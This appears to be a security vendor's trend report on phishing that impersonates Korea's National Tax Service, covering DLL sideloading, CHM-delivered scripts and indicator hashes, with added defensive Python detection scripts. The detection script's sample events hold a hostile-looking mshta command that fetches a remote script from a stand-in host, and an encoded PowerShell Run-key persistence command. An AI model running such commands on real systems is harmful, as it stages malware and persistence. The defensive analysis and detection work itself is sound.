Trend Report on Phishing Malware Impersonating the National Tax Service (NTS)

Phishing emails impersonating the National Tax Service (NTS) increase noticeably whenever value-added tax (VAT) and other taxes come due. AhnLab SEcurity intelligence Center (ASEC) has been alerting users to this threat by publishing relevant content.

 

Phishing campaigns impersonating the National Tax Service have been ongoing for several years, but the distribution volume identified by AhnLab has increased significantly in 2024. Their key characteristics are that the threat actors forge the sender address so that the email appears to come from the National Tax Service, and that they craft and attach malicious files in a variety of formats.

 

Phishing emails impersonating the NTS can be classified into two major categories by the way the malware is delivered: 1) as an email attachment, and 2) via a hyperlink in the email body that leads to a website hosting the malware. Threat actors use a wide range of file formats for their attachments. The following table summarizes the eight file formats observed and the malicious behavior that is ultimately executed for each.

 


Figure 1. Example of a phishing email

File format            | Final malicious behavior
HTML (script file)     | Leaks user account credentials to a C2 server
VBS (script file)      | Operates as a downloader and often uses PowerShell commands (e.g. GuLoader)
PPT (document file)    | Operates as a downloader (e.g. Lokibot, AgentTesla)
DLL (executable file)  | Performs malicious behavior via DLL hijacking, loaded by a legitimate executable shipped alongside it
SCR (screen saver file)| Operates as a dropper (NSIS installer format)
EXE (executable file)  | Directly executes downloader/infostealer malware (e.g. GuLoader, Lokibot, Formbook, Remcos)
LNK (shortcut file)    | Disguised as a Hangul document with the .hwp extension and icon; downloads additional malware
CHM (Windows help file)| Executes additional scripts hosted at a specific URL through the MSHTA process

Table 1. Summary of the malicious behavior executed for each file format

 

Of the eight file formats, this report takes a closer look at the DLL and CHM cases.

 

  • DLL (Executable File)

 

The DLL cases work differently from the other file types. The DLL that carries the malicious functionality is delivered inside a compressed file named ‘NTS_eTaxInvoice.zip’, together with a legitimate executable that loads it.

As the figure below shows, the ‘NTS_eTaxInvoice.exe’ file inside the archive is a legitimate ‘Haihaisoft PDF Reader’ binary; only the file name has been changed to a National Tax Service-related keyword. When this file is executed, the ‘msimg32.dll’ file sitting in the same folder is loaded in place of the genuine Windows msimg32.dll (DLL hijacking) and performs the malicious behavior. This works because the Windows loader, for a DLL that is not on the KnownDLLs list, searches the application’s own directory before the system directory, so a same-named DLL placed beside the executable wins.


Figure 2. Legitimate file (NTS_eTaxInvoice.exe) with a PDF icon and malicious DLL (msimg32.dll)

At the time of analysis, the Git repository used to stage the next-stage payload could no longer be reached. However, the malware previously hosted there has been identified as XWorm. XWorm can monitor the victim’s webcam and keystrokes (keylogging), and also steals system information and user account credentials.
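The sideloading pattern above (a renamed legitimate EXE next to a same-named system DLL) can be triaged mechanically. The following script is an added example, not code from the ASEC report or from the malware: it parses a PE import table by hand, and flags any imported DLL that normally resolves from System32 but has a same-named file beside the executable. The SYSTEM_DLLS set is an illustrative subset (a production check would compare against a listing of %SystemRoot%\System32), and build_min_pe() fabricates a tiny PE32+ image purely so the check can run offline; it is scaffolding, not malware.

```python
"""Added example: flag DLL-sideloading candidates in an extracted archive."""
import struct
import tempfile
from pathlib import Path

# Illustrative subset (assumption for this example) of Windows DLLs that live in
# System32 but are not KnownDLLs, so the loader checks the application directory first.
SYSTEM_DLLS = {"msimg32.dll", "version.dll", "dwmapi.dll", "uxtheme.dll",
               "winmm.dll", "wtsapi32.dll", "cryptbase.dll"}


def pe_imports(data: bytes) -> list[str]:
    """Return the lower-cased DLL names in the image's import directory."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    pe = struct.unpack_from("<I", data, 0x3C)[0]           # e_lfanew
    if data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    n_sections = struct.unpack_from("<H", data, pe + 6)[0]
    size_opt = struct.unpack_from("<H", data, pe + 20)[0]
    opt = pe + 24                                           # optional header
    magic = struct.unpack_from("<H", data, opt)[0]
    data_dirs = opt + (96 if magic == 0x10B else 112)       # PE32 vs PE32+
    imp_rva = struct.unpack_from("<I", data, data_dirs + 8)[0]  # directory index 1
    sections = []
    sect_tbl = opt + size_opt
    for i in range(n_sections):
        vsize, va, rawsize, raw = struct.unpack_from("<IIII", data, sect_tbl + 40 * i + 8)
        sections.append((va, max(vsize, rawsize), raw))

    def to_off(rva: int) -> int:                            # RVA -> file offset
        for va, size, raw in sections:
            if va <= rva < va + size:
                return raw + (rva - va)
        raise ValueError(f"RVA {rva:#x} not backed by any section")

    names = []
    if imp_rva == 0:
        return names
    desc = to_off(imp_rva)
    while True:                                             # 20-byte IMAGE_IMPORT_DESCRIPTORs
        fields = struct.unpack_from("<IIIII", data, desc)
        if not any(fields):                                 # all-zero terminator
            break
        name_off = to_off(fields[3])
        names.append(data[name_off:data.index(b"\0", name_off)].decode("ascii", "replace").lower())
        desc += 20
    return names


def sideload_candidates(exe_path) -> list[str]:
    """Imported system DLLs that also exist beside the executable (hijack candidates)."""
    exe_path = Path(exe_path)
    imports = pe_imports(exe_path.read_bytes())
    # NTFS is case-insensitive; names are lower-cased here so the demo also works on Linux.
    return [d for d in imports if d in SYSTEM_DLLS and (exe_path.parent / d).exists()]


def build_min_pe(dll_names: list[str]) -> bytes:
    """Constructed test scaffolding: a minimal PE32+ whose only content is an import directory."""
    sect_rva, sect_raw = 0x1000, 0x200
    body, strings = bytearray(), bytearray()
    names_off = 20 * (len(dll_names) + 1)                   # descriptors + terminator
    for name in dll_names:
        body += struct.pack("<IIIII", 0, 0, 0, sect_rva + names_off + len(strings), 0)
        strings += name.encode() + b"\0"
    body += bytes(20) + strings
    body += bytes((-len(body)) % 0x200)                     # pad to FileAlignment
    dos = bytearray(64); dos[:2] = b"MZ"; struct.pack_into("<I", dos, 0x3C, 0x40)
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x8664, 1, 0, 0, 0, 240, 0x22)
    opt = bytearray(240)
    struct.pack_into("<H", opt, 0, 0x20B)                   # PE32+ magic
    struct.pack_into("<II", opt, 32, 0x1000, 0x200)         # Section/FileAlignment
    struct.pack_into("<I", opt, 108, 16)                    # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 112 + 8, sect_rva, len(body))  # import directory
    sect = struct.pack("<8sIIIIIIHHI", b".idata", len(body), sect_rva, len(body),
                       sect_raw, 0, 0, 0, 0, 0x40000040)
    headers = dos + coff + opt + sect
    headers += bytes(sect_raw - len(headers))
    return bytes(headers) + bytes(body)


def demo() -> list[str]:
    """Recreate the NTS_eTaxInvoice.exe + msimg32.dll layout in a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        d = Path(tmp)
        (d / "NTS_eTaxInvoice.exe").write_bytes(build_min_pe(["KERNEL32.dll", "msimg32.dll", "USER32.dll"]))
        (d / "msimg32.dll").write_bytes(b"")                # empty stand-in for the planted DLL
        return sideload_candidates(d / "NTS_eTaxInvoice.exe")


if __name__ == "__main__":
    print(demo())
```

Run sideload_candidates() against each EXE in an extracted archive; a non-empty result means an implicit import will be satisfied from the archive rather than from System32, which is exactly the condition the NTS_eTaxInvoice.zip sample relies on.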

As these cases show, threat actors try various delivery methods rather than sending a single executable file. Users are advised to take extra caution.

  • CHM (Windows Help File)

 

A CHM file is a compiled HTML help file; legitimate CHM files are mostly distributed with software packages. When a malicious CHM file is opened, the script embedded in it is triggered automatically through the Click method (the page’s script calls Click() on an HTML Help ActiveX shortcut object, so nothing beyond opening the file is required). The file names of the distributed samples usually impersonate the National Tax Service, virtual asset trading platforms, or financial companies. In the attack that impersonated the National Tax Service under the guise of a “tax invoice,” the file name mirrored the actual name of the electronic tax invoice file, as in the cases with other extensions. The file name identified at the time was NTS_eTaxInvoice.chm.


Figure 3. Screen after executing the malicious CHM

 

When the CHM file is executed, a help window like the one in the figure above appears, which users are likely to mistake for normal behavior. Because of the file format, the CHM archive contains an HTML file, and that HTML file carries the malicious script. The script launches the MSHTA process (mshta.exe) to access a specific URL.

 


Figure 4. Part of the code that contains a malicious script inside the CHM file

In the figure above, the URL accessed by mshta.exe serves JavaScript that executes an encoded PowerShell command. This ultimately leads to functions such as registering a Run key in the registry for persistence, receiving commands from the threat actor’s C2 server, and sending back the results of the executed commands.

 

In addition to the type described above, several other CHM variants using the same file name (NTS_eTaxInvoice.chm) have been identified. The format is the same, an HTML file carrying a malicious script, but these scripts are characterized by creating and executing BAT and VBS script files. Through them they perform additional functions such as downloading other malware that steals user information and registering a Run key, and ultimately carry out the malicious behavior.
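The chain described in the last two sections (hh.exe opening the CHM, mshta.exe fetching a remote script, an encoded PowerShell command that writes a Run key, and variants that spawn BAT/VBS scripts) is a good fit for process-creation telemetry. The script below is an added example, not code from the report: it runs a few detection rules over constructed Sysmon-style events and decodes the -EncodedCommand payload. The event fields, the URL and the PowerShell command are invented for the demo and are not the report’s indicators.

```python
"""Added example: detection rules for the CHM -> mshta -> PowerShell chain over constructed events."""
import base64
import re

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
_ENC_FLAG = re.compile(
    r"(?i)(?:^|\s)[-/](?:" + "|".join("encodedcommand"[:i] for i in range(1, 15))
    + r")\s+([A-Za-z0-9+/=]+)")
_URL = re.compile(r"(?i)\bhttps?://[^\s\"']+")
_RUN_KEY = re.compile(r"(?i)currentversion\\run(?:once)?\b")
# Script hosts / LOLBins that the HTML Help viewer (hh.exe) or mshta.exe has no business spawning.
LOLBINS = {"mshta.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
           "cmd.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe"}


def basename(path: str) -> str:
    return re.split(r"[\\/]", path)[-1].lower()


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE), or None."""
    m = _ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(events):
    """Apply the rules to a list of {Image, ParentImage, CommandLine} dicts; return (rule, detail) pairs."""
    alerts = []
    for ev in events:
        img, parent, cmd = basename(ev["Image"]), basename(ev["ParentImage"]), ev["CommandLine"]
        if parent == "hh.exe" and img in LOLBINS:           # CHM script launched a script host
            alerts.append(("chm_spawned_lolbin", f"{parent} -> {img}: {cmd}"))
        if img == "mshta.exe":
            m = _URL.search(cmd)
            if m:                                            # remote .hta / script stage
                alerts.append(("mshta_remote_script", m.group(0)))
        if parent == "mshta.exe" and img in LOLBINS:        # second-stage interpreter
            alerts.append(("mshta_spawned_child", f"{parent} -> {img}"))
        decoded = decode_encoded_command(cmd)
        if decoded is not None:
            alerts.append(("encoded_powershell", decoded))
            if _RUN_KEY.search(decoded):                     # persistence via Run key
                alerts.append(("run_key_persistence", decoded))
    return alerts


# --- constructed sample data (not real telemetry, not the report's IOCs) ---
DECODED_CMD = ("Set-ItemProperty -Path 'HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run' "
               "-Name 'Updater' -Value 'C:\\Users\\Public\\u.vbs'")
ENCODED = base64.b64encode(DECODED_CMD.encode("utf-16-le")).decode("ascii")

SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\hh.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\hh.exe" C:\Users\user\Downloads\NTS_eTaxInvoice.chm'},
    {"Image": r"C:\Windows\System32\mshta.exe", "ParentImage": r"C:\Windows\hh.exe",
     "CommandLine": "mshta http://stage.example.invalid/1.hta"},          # invented URL
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "powershell -nop -w hidden -enc " + ENCODED},
]
BENIGN_EVENTS = [
    {"Image": r"C:\Windows\System32\mshta.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'mshta "C:\Program Files\Vendor\help.hta"'},        # local HTA, no URL
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell -ep bypass -File C:\Scripts\backup.ps1"},  # -ep is not -enc
]

if __name__ == "__main__":
    for rule, detail in analyze(SAMPLE_EVENTS):
        print(f"[{rule}] {detail}")
    print("benign:", analyze(BENIGN_EVENTS))
```

The parent/child rules (hh.exe or mshta.exe spawning a script host) are the durable part of this logic: they also catch the BAT/VBS variants, which change the payload but not the fact that a help viewer is launching interpreters. Decoding -EncodedCommand before matching is what lets the Run-key rule fire even though the registry path never appears in the raw command line.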

 

As the cases above show, threat actors continuously exploit topics that interest users in their phishing attacks. During the tax filing period in particular, users need to be extra cautious because genuine emails from the National Tax Service arrive at the same time, which makes the fakes harder to tell apart.

 

MD5

05837a48b135d663e59ecc9f8b472296
0b7a0d57437157f8695fdb1b3eb43186
0d641051aa6752349e65d81c4a8d4ed0
1432d0d6ef98a0e39954d44784c646de
1c7db662e63fce6fb8122e5ff26a2f1d